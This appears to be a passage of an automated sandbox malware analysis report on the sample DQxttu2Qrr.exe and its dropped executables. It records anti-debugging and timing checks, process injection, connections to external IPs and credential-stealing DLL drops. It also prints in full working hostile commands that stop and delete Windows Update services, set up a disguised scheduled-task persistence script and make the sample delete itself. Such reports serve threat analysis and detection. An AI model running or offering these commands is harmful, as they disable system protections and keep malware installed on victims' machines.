Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000016693EB second address: 0000000001669432 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 xchg eax, edi 0x00000004 inc ecx 0x00000005 pop eax 0x00000006 dec eax 0x00000007 cmovbe eax, eax 0x0000000a inc cx 0x0000000c xchg esp, ebx 0x0000000e inc ecx 0x0000000f pop edx 0x00000010 inc ecx 0x00000011 xchg bh, cl 0x00000013 dec eax 0x00000014 cwde 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 inc bp 0x0000001b movsx esp, dl 0x0000001e cwd 0x00000020 lahf 0x00000021 inc ecx 0x00000022 pop ecx 0x00000023 inc ecx 0x00000024 movzx ebx, si 0x00000027 inc eax 0x00000028 setb bh 0x0000002b inc cx 0x0000002d xchg esp, ebx 0x0000002f pop esi 0x00000030 movzx eax, bp 0x00000033 inc cx 0x00000035 movsx eax, al 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a setb ah 0x0000003d inc ebp 0x0000003e movzx esi, ax 0x00000041 inc ecx 0x00000042 pop esp 0x00000043 dec esp 0x00000044 movzx esi, ax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000016D9DA1 second address: 00000000014DE6C8 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 pop ebp 0x00000004 dec esp 0x00000005 arpl dx, ax 0x00000007 dec ecx 0x00000008 cmovb edi, ecx 0x0000000b inc ecx 0x0000000c pop ebx 0x0000000d inc ebp 0x0000000e mov bh, bh 0x00000010 dec ecx 0x00000011 arpl dx, cx 0x00000013 inc ecx 0x00000014 pop eax 0x00000015 cbw 0x00000017 dec eax 0x00000018 movsx ecx, di 0x0000001b dec ebp 0x0000001c cmovle esi, eax 0x0000001f inc ecx 0x00000020 pop edx 0x00000021 cbw 0x00000023 jmp 00007FB5AC78D92Ch 0x00000028 inc ecx 0x00000029 pop edi 0x0000002a inc esp 0x0000002b movzx ecx, si 0x0000002e pop ecx 0x0000002f cwde 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 000000000176451B second address: 000000000176452D instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 dec ecx 0x00000005 movzx ebx, ax 0x00000008 inc ecx 0x00000009 pop edi 0x0000000a cbw 0x0000000c pop ecx 0x0000000d inc eax 0x0000000e mov dh, dh 0x00000010 inc ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 000000000176452D second address: 000000000176453B instructions: 0x00000000 rdtsc 0x00000002 inc cx 0x00000004 bswap esi 0x00000006 pop esi 0x00000007 inc esp 0x00000008 mov ah, dl 0x0000000a pop edi 0x0000000b dec esp 0x0000000c arpl bp, si 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000016FA149 second address: 0000000001BA06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5ACE2F84Fh 0x00000007 inc ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a inc ecx 0x0000000b mov bl, bl 0x0000000d pop edi 0x0000000e movsx eax, bp 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 000000000173E4D5 second address: 0000000001696CB2 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 cwd 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 lahf 0x00000008 pop esi 0x00000009 pop edi 0x0000000a lahf 0x0000000b dec ebp 0x0000000c arpl bp, sp 0x0000000e pop ebx 0x0000000f jmp 00007FB5AC8E17FCh 0x00000014 inc ecx 0x00000015 pop esp 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000016C0841 second address: 000000000172F30A instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 movsx ebp, bx 0x00000006 inc ecx 0x00000007 pop ebp 0x00000008 inc bp 0x0000000a movzx edi, cl 0x0000000d pop ebp 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 inc ecx 0x00000011 pop eax 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 inc ebp 0x00000015 movsx edi, dx 0x00000018 dec ebp 0x00000019 arpl si, si 0x0000001b dec eax 0x0000001c movzx edx, di 0x0000001f inc ecx 0x00000020 pop edi 0x00000021 mov si, 6F30h 0x00000025 dec eax 0x00000026 cdq 0x00000027 dec eax 0x00000028 movsx ebx, bp 0x0000002b pop ecx 0x0000002c jmp 00007FB5AC9F7D3Ch 0x00000031 inc ecx 0x00000032 pop ecx 0x00000033 cdq 0x00000034 inc cx 0x00000036 movsx eax, dh 0x00000039 inc esp 0x0000003a movsx esp, bp 0x0000003d pop esi 0x0000003e cbw 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 000000000172F30A second address: 000000000172F310 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop esp 0x00000004 cwd 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000016B2E25 second address: 00000000016B2E5E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, 61C07295h 0x00000009 inc ecx 0x0000000a pop eax 0x0000000b dec eax 0x0000000c cdq 0x0000000d dec ebp 0x0000000e movsx esp, sp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 dec eax 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 movzx ax, ah 0x0000001c cwd 0x0000001e cdq 0x0000001f pop ecx 0x00000020 inc ecx 0x00000021 pop ecx 0x00000022 inc esp 0x00000023 movzx esp, di 0x00000026 inc ebp 0x00000027 movsx esp, dx 0x0000002a inc ecx 0x0000002b xchg dh, al 0x0000002d pop esi 0x0000002e cbw 0x00000030 dec ecx 0x00000031 arpl sp, bx 0x00000033 inc cx 0x00000035 movzx eax, bl 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe RDTSC instruction interceptor: First address: 00000000010EEF30 second address: 00000000010EEF3F instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\ProgramData\61312899942613011832.exe RDTSC instruction interceptor: First address: 00000000017925FE second address: 00000000017B33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC943F91h 0x00000008 call 00007FB5AC8E2811h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA956AAh 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 000000000527D526 second address: 000000000527D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe RDTSC instruction interceptor: First address: 00007FF676941E5F second address: 00007FF676941E7F instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe RDTSC instruction interceptor: First address: 00007FF6768E9972 second address: 00007FF6768E99A1 instructions: 0x00000000 rdtsc 0x00000002 inc eax 0x00000003 rcr dh, FFFFFFDEh 0x00000006 pop esi 0x00000007 dec ecx 0x00000008 shl edi, cl 0x0000000a dec eax 0x0000000b cdq 0x0000000c pop ecx 0x0000000d dec ebp 0x0000000e movzx ecx, di 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 inc dx 0x00000018 inc ecx 0x00000019 pop edx 0x0000001a dec eax 0x0000001b cwde 0x0000001c ror ebx, cl 0x0000001e pop ebp 0x0000001f adc al, DDh 0x00000021 popfd 0x00000022 bswap dx 0x00000025 inc esp 0x00000026 movsx esi, bp 0x00000029 inc ecx 0x0000002a pop eax 0x0000002b inc ecx 0x0000002c sete ah 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe RDTSC instruction interceptor: First address: 00007FF675F42B33 second address: 00007FF675F42B4C instructions: 0x00000000 rdtsc 0x00000002 movzx edi, sp 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 not dx 0x0000000a inc ecx 0x0000000b pop ebp 0x0000000c inc ecx 0x0000000d pop esi 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 dec eax 0x00000011 movsx eax, sp 0x00000014 pop edi 0x00000015 dec ecx 0x00000016 movzx ebx, cx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe RDTSC instruction interceptor: First address: 00007FF675F9FC76 second address: 00007FF675F9FC96 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000106587EA second address: 0000000010658809 instructions: 0x00000000 rdtsc 0x00000002 ror cl, 1 0x00000004 ror edx, FFFFFF86h 0x00000007 xor ax, si 0x0000000a not cl 0x0000000c clc 0x0000000d xor bl, cl 0x0000000f push esi 0x00000010 push edi 0x00000011 rol dh, FFFFFF9Dh 0x00000014 rcl eax, cl 0x00000016 test bx, bx 0x00000019 push ebx 0x0000001a mov ebx, ecx 0x0000001c movsx eax, di 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Windows\SysWOW64\timeout.exe TID: 5640 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5784 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6044 Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6048 Thread sleep time: -1440000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6040 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe TID: 2364 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5540 Thread sleep count: 9502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9502
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000002.376729200.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi0ymi0ma.wclwox4jcqzsnqbjvsl_=;
Source: gntuud.exe, 0000000D.00000003.367227251.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DQxttu2Qrr.exe Binary or memory string: vmCi`
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000003.368888031.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61E354D1 sqlite3_os_init,GetSystemInfo, 0_2_61E354D1
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe System information queried: ModuleInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Handle closed: DEADC0DE
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\61312899942613011832.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000018002\avicapn32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process queried: DebugObjectHandle
Source: C:\ProgramData\61312899942613011832.exe Process queried: DebugPort
Source: C:\ProgramData\61312899942613011832.exe Process queried: DebugObjectHandle
Source: C:\ProgramData\61312899942613011832.exe Process queried: DebugObjectHandle
Source: C:\ProgramData\61312899942613011832.exe Process queried: DebugObjectHandle
Source: C:\ProgramData\61312899942613011832.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe System information queried: KernelDebuggerInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.3 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 85.209.135.109 80
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Section loaded: C:\Users\user\AppData\Local\Temp\jekppnay.tmp target: unknown protection: readonly
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 32F0000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 2D80000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Memory written: C:\Windows\System32\dialer.exe base: BE2470010
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: DFD008
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: 32F0000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ie.cs Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, jb.cs Reference to suspicious API methods: ('c', 'GetProcAddress@kernel32.dll'), ('a', 'LoadLibrary@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ud.cs Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Thread register set: target process: 2240
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\ProgramData\61312899942613011832.exe Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
